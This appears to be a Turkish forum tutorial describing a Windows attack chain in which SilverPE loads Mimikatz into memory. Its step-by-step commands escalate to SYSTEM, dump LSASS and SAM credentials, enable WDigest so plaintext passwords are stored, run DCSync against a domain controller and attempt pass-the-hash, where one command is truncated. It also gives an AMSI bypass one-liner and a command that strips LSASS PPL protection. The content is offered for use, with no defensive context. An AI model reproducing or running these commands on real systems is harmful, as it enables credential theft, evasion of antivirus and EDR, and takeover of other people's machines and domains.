SilverPE ve Mimikatzz kullanarak LPE saldırısı
Örnek Kullanım
# Payload'ı doğru klasöre koy
copy C:\tools\mimikatz.dll .\mnt\
# 64-bit sistemde çalıştır
.\SilverPE_x64.exe --x64 mimikatz.dll
SilverPE + Mimikatz Kill chain
Aşama 1: Mimikatz DLL'ini Hazırla
- Mimikatz GitHub 'ten mimikatz.dll indir
- Dosyayı SilverPE klasörüne kopyala
copy mimikatz.dll C:\SilverPE\mnt\
Aşama 2: SilverPE ile Mimikatz'i Belleğe Yükle
cd C:\SilverPE\mnt
# 64-bit yükleme
.\SilverPE_x64.exe --x64 mimikatz.dll
# 32-bit yükleme
.\SilverPE_x64.exe --x86 mimikatz.dll
Başarılı: Ekranda [+] PE loaded successfully mesajı görürsün.
Aşama 3: Mimikatz ile Yetki Yükseltme
# Mimikatz komut satırına gir
mimikatz #
# 1. DEBUG yetkisini al (LSASS'e erişim için)
mimikatz # privilege::debug
# 2. SYSTEM yetkisine yüksel
mimikatz # token::elevate
# 3. Bellekteki kimlik bilgilerini çek
mimikatz # sekurlsa::logonpasswords
Aşama 4: Windows 10'da Açık Metin Şifre Yakalama(klasik)
Windows 10 varsayılan olarak şifreleri açık metin saklamaz. Açık metin şifre yakalamak için:# WDigest özelliğini aktif et (Yönetici olarak)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
# Kullanıcı oturumunu kapat ve yeniden aç
Aşama 5: SAM ve LSASS Dump
# Yerel kullanıcı hash'lerini oku
mimikatz # lsadump::sam
# Domain Controller'dan DCSync (domain ortamında)
mimikatz # lsadump::dcsync /domain:hedef.com /user:administrator
Aşama 6: Pass-the-Hash ile Yanal Hareket
Elde ettiğin NTLM hash'leri ile diğer sistemlere eriş:# Pass-the-Hash ile giriş
mimikatz # sekurlsa:
# Yeni bir cmd oturumu açılacak
4. EDR/AV Atlatma Taktikleri
4.1. AMSI Bypass (PowerShell)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
4.2. LSASS PPL Korumasını Kaldırma
# Mimikatz içinde PPL kaldırma
mimikatz # !processprotect /process:lsass.exe /remove
# Alternatif
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
Son düzenleme: